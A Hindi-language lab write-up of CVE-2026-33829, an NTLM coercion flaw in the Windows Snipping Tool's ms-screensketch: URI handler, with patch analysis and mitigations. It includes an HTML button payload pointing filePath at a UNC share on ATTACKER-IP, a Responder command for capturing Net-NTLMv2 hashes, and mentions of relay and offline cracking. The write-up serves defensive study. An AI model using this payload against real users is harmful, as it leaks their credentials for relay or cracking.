
कमज़ोरी केस स्टडी: CVE-2026-33829 (Windows Snipping Tool NTLM Coercion)
भेद्यता केस स्टडी: CVE-2026-33829 (Windows Snipping Tool NTLM दबाव)
यह लेख आधुनिक Windows Snipping Tool एप्लिकेशन फ्रेमवर्क के भीतर CVE-2026-33829 नामक एक सूचना प्रकटीकरण भेद्यता के तकनीकी पुनरुत्पादन का विवरण देता है। एक कस्टम URI प्रोटोकॉल हैंडलर के भीतर एक अमान्य इनपुट पैरामीटर का दुरुपयोग करके, एक दूरस्थ होस्ट एक अप्रयुक्त Windows मशीन को आउटबाउंड SMB कनेक्शन शुरू करने के लिए मजबूर कर सकता है, जिसके परिणामस्वरूप नेटवर्क पर Net-NTLMv2 प्रमाणीकरण हैश लीक हो जाते हैं।
URI योजना - (Windows वेब ब्राउज़र को डेस्कटॉप ऐप से बात करने देने के लिए कस्टम प्रोटोकॉल (जैसे ms-screensketch:, ms-settings: , file:) का उपयोग करता है।
इस भेद्यता का मूल कारण URI योजना (ms-screensketch:edit) में निहित है। जब कोई पीड़ित (ms-screensketch:edit?&filePath=\\ATTACKER_IP\\share\evil.png) वाले एक दुर्भावनापूर्ण लिंक पर क्लिक करता है और "Open Snipping Tool" को अनुमोदित करता है, तो ऑपरेटिंग सिस्टम SnippingTool.exe को लागू करता है और बिना उचित सत्यापन के दुर्भावनापूर्ण filePath पैरामीटर, जैसे (ms-screensketch:edit?filePath=\\ATTACKER-IP\\share\evil.png), पास करता है।
चूंकि एक :edit? पैरामीटर है, स्निपिंग टूल प्रदान किए गए फ़ाइलपथ (filePath=\\ATTACKER-IP\\share\evil.png) से फ़ाइल को संपादित करने का प्रयास करता है। जिसके परिणामस्वरूप सर्वर मैसेज ब्लॉक (SMB) का उपयोग करके नेटवर्क पर एक कनेक्शन शुरू होता है। क्योंकि SMB को यह सत्यापित करने के लिए डिज़ाइन किया गया है कि फ़ाइल कौन मांग रहा है, Windows स्वचालित रूप से उपयोगकर्ता को प्रमाणित करने का प्रयास करता है। यह वर्तमान में लॉग-इन उपयोगकर्ता के Net-NTLMv2 चैलेंज-प्रतिक्रिया हैश को हमलावर के सर्वर पर भेजता है। यह पूरी प्रक्रिया उपयोगकर्ता को किसी भी दृश्य चेतावनी या संकेत के बिना, पृष्ठभूमि में चुपचाप होती है।
हमलावर पीड़ित के Net-NTLMv2 चैलेंज-प्रतिक्रिया प्रमाणीकरण डेटा को कैप्चर करता है। एक बार जब हमलावर के पास पीड़ित का Net-NTLM हैश होता है, तो वे पीड़ित का रूप धारण करने और आंतरिक नेटवर्क संसाधनों तक पहुंचने या उद्यम में अन्य सेवाओं को प्रमाणित करने के लिए NTLM रिले हमला कर सकते हैं, या कैप्चर किए गए हैश को ऑफलाइन ले जा सकते हैं और पीड़ित के वास्तविक सादे-पाठ Windows पासवर्ड की खोज करने के लिए ब्रूट-फोर्स या डिक्शनरी हमलों का उपयोग कर सकते हैं।
हैंडलर को ट्रिगर करने के लिए, फ़िशिंग या इंट्रानेट-समझौता वेक्टर का अनुकरण करने के लिए एक सरल HTML पेलोड तैनात किया गया था।
<!DOCTYPE html>
<html>
<body>
<button onclick="window.location.href='ms-screensketch:edit?&filePath=\\ATTACKER-IP\share\test.png&isTemporary=false&saved=true&source=Toast'">Launch Verification</button>
</body>
</html>
हैश को कैप्चर करने के लिए, Responder चलाने वाला एक पृथक Kali Linux उदाहरण तैनात किया गया था।
sudo responder -I eth0 -v
लक्ष्य Windows वातावरण के भीतर बटन पर क्लिक करने पर, एप्लिकेशन ने Edit कॉन्टेक्स्ट खोला और तुरंत लिसनर होस्ट को एक SMB अनुरोध रूट किया। प्रमाणीकरण चैलेंज-प्रतिक्रिया अनुक्रम सुचारू रूप से पूरा हुआ, जिससे लक्ष्य उपयोगकर्ता संदर्भ के लिए Net-NTLMv2 हैश संरचना कैप्चर हुई।
NTLMSSP_NEGOTIATE पैकेट दिखाता है कि हमलावर-नियंत्रित UNC पथ को हल करने के बाद, पीड़ित सिस्टम SMB सत्र सेटअप के दौरान NTLM प्रमाणीकरण शुरू कर रहा है।
NTLMSSP_AUTH पैकेट में चैलेंज चरण पूरा होने के बाद पीड़ित सिस्टम द्वारा प्रेषित Net-NTLMv2 चैलेंज-प्रतिक्रिया प्रमाणीकरण डेटा होता है।
उससे, हमलावर पारित NTLMv2 हैश को कैप्चर करता है।
कैप्चर किए गए Net-NTLMv2 चैलेंज-प्रतिक्रिया डेटा का उपयोग NTLM रिले हमलों में किया जा सकता है या लक्ष्य वातावरण के आधार पर ऑफलाइन पासवर्ड क्रैकिंग प्रयासों के अधीन किया जा सकता है।
विंडोज ने इसे कैसे पैच किया?
पैच से पहले, स्निपिंग टूल का Edit फ़ंक्शन filePath के अंदर की स्ट्रिंग लेता था और इसे सीधे फ़ाइल-खोलने वाले API में भेजता था।
देखे गए पैच किए गए व्यवहार से पता चलता है कि Microsoft ने सत्यापन तर्क पेश किया है जो UNC/नेटवर्क-आधारित filePath मानों को अंतर्निहित फ़ाइल हैंडलिंग API तक पहुंचने से रोकता है। अब, जब आप filePath में एक स्ट्रिंग पास करते हैं, तो एप्लिकेशन इसे ऑपरेटिंग सिस्टम को सौंपने से पहले एक सैनिटी जांच चलाता है:
यह जांचता है कि स्ट्रिंग स्थानीय ड्राइव मार्कर (जैसे C:\ या D:) या मानक सुरक्षित स्थानीय सिस्टम वेरिएबल से शुरू होती है या नहीं।
यदि एप्लिकेशन एक यूनिवर्सल नेमिंग कन्वेंशन (UNC) उपसर्ग (जैसे \ या \\) या एक बाहरी IP नेटवर्क पैटर्न का पता लगाता है, तो सत्यापन लूप इसे एक अवैध तर्क के रूप में चिह्नित करता है, एक अपवाद त्रुटि फेंकता है, और फ़ाइल-लोडिंग प्रक्रिया को तुरंत समाप्त करता है।
क्योंकि कोड Win32 फ़ाइल-खोलने के निर्देशों को निष्पादित करने से पहले रुक जाता है, Windows कर्नेल को कभी अनुरोध नहीं मिलता, और कोई SMB पैकेट कभी नहीं भेजा जाता है।
यदि हम सुरक्षा अद्यतन का पालन करने के बाद पुनः प्रयास करते हैं, तो एप्लिकेशन अभी भी ms-screensketch: हैंडलर को लागू करता है, लेकिन दूरस्थ filePath मान अब Edit कार्यप्रवाह के माध्यम से हल नहीं किए गए थे।
सुनिश्चित करें कि सभी Windows एंडपॉइंट 14 अप्रैल, 2026 के सुरक्षा पैच बेसलाइन से परे अपडेट किए गए हैं, जो एप्लिकेशन हैंडलर में सख्त इनपुट सत्यापन सीमाएं पेश करता है।
अनधिकृत बाहरी नेटवर्क के लिए आउटबाउंड TCP पोर्ट 445 ट्रैफ़िक को अवरुद्ध करने वाले सख्त ईग्रेस फ़ायरवॉल नियम लागू करें, जिससे क्रेडेंशियल लीकेज का जोखिम कम हो।
दूरस्थ सर्वरों पर आउटबाउंड NTLM ट्रैफ़िक को प्रतिबंधित करने, जहां लागू हो वहां Kerberos जैसे सुरक्षित वैकल्पिक प्रोटोकॉल को मजबूर करने के लिए ग्रुप पॉलिसी ऑब्जेक्टिव्स (GPO) कॉन्फ़िगर करें।
अस्वीकरण: यह लेख पूरी तरह से शैक्षिक, रक्षात्मक अनुसंधान और प्रयोगशाला सत्यापन उद्देश्यों के लिए संकलित किया गया है। सभी परीक्षण पूरी तरह से पृथक सैंडबॉक्स वातावरण में किया गया।